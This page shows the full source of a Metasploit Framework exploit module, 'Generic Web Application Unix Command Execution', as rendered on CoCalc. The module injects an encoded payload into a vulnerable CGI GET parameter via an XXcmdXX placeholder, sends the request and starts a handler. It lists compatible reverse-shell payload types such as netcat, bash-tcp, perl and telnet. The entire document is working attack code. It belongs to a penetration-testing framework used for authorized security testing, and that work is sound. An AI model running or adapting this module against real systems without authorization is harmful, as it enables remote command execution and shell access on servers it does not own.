Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/generic_exec.rb
21633 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Generic Web Application Unix Command Execution',

17
        'Description' => %q{

18
          This module can be used to exploit any generic command execution vulnerability

19
          for CGI applications on Unix-like platforms. To use this module, specify the

20
          CMDURI path, replacing the command itself with XXcmdXX. This module is currently

21
          limited to forms vulnerable through GET requests with query parameters.

22
        },

23
        'Author' => [ 'hdm' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [ ],

26
        'Privileged' => false,

27
        'Payload' => {

28
          'DisableNops' => true,

29
          'Space' => 1024,

30
          'Compat' =>

31
                        {

32
                          'PayloadType' => 'cmd cmd_bash',

33
                          'RequiredCmd' => 'generic perl telnet netcat netcat-e bash-tcp',

34
                        }

35
        },

36
        'Platform' => 'unix',

37
        'Arch' => ARCH_CMD,

38
        'Targets' => [[ 'Automatic', {}]],

39
        'DisclosureDate' => '1993-11-14', # CGI historical date :)

40
        'DefaultTarget' => 0,

41
        'Notes' => {

42
          'Reliability' => UNKNOWN_RELIABILITY,

43
          'Stability' => UNKNOWN_STABILITY,

44
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

45
        }

46
      )

47
    )

48


49
    register_options(

50
      [

51
        OptString.new('CMDURI', [true, "The full URI path with the XXcmdXX parameter", "/cgi-bin/generic?cmd=XXcmdXX"]),

52
      ]

53
    )

54
  end

55


56
  def exploit

57
    uri = datastore['CMDURI'].to_s

58
    uri, query = uri.split('?', 2)

59


60
    if query

61
      query = query.split('&').map { |var|

62
        k, v = var.split('=', 2)

63
        Rex::Text.uri_encode(k) + "=" + Rex::Text.uri_encode(v.gsub("XXcmdXX", payload.encoded))

64
      }.join('&')

65
      uri = uri + '?' + query

66
    end

67


68
    print_status("Sending HTTP request for #{uri}")

69
    res = send_request_cgi({

70
      'global' => true,

71
      'uri' => uri

72
    }, 30)

73


74
    if res

75
      print_status("The server responded with HTTP CODE #{res.code}")

76
    else

77
      print_status("The server did not respond to our request")

78
    end

79


80
    handler

81
  end

82
end

83


84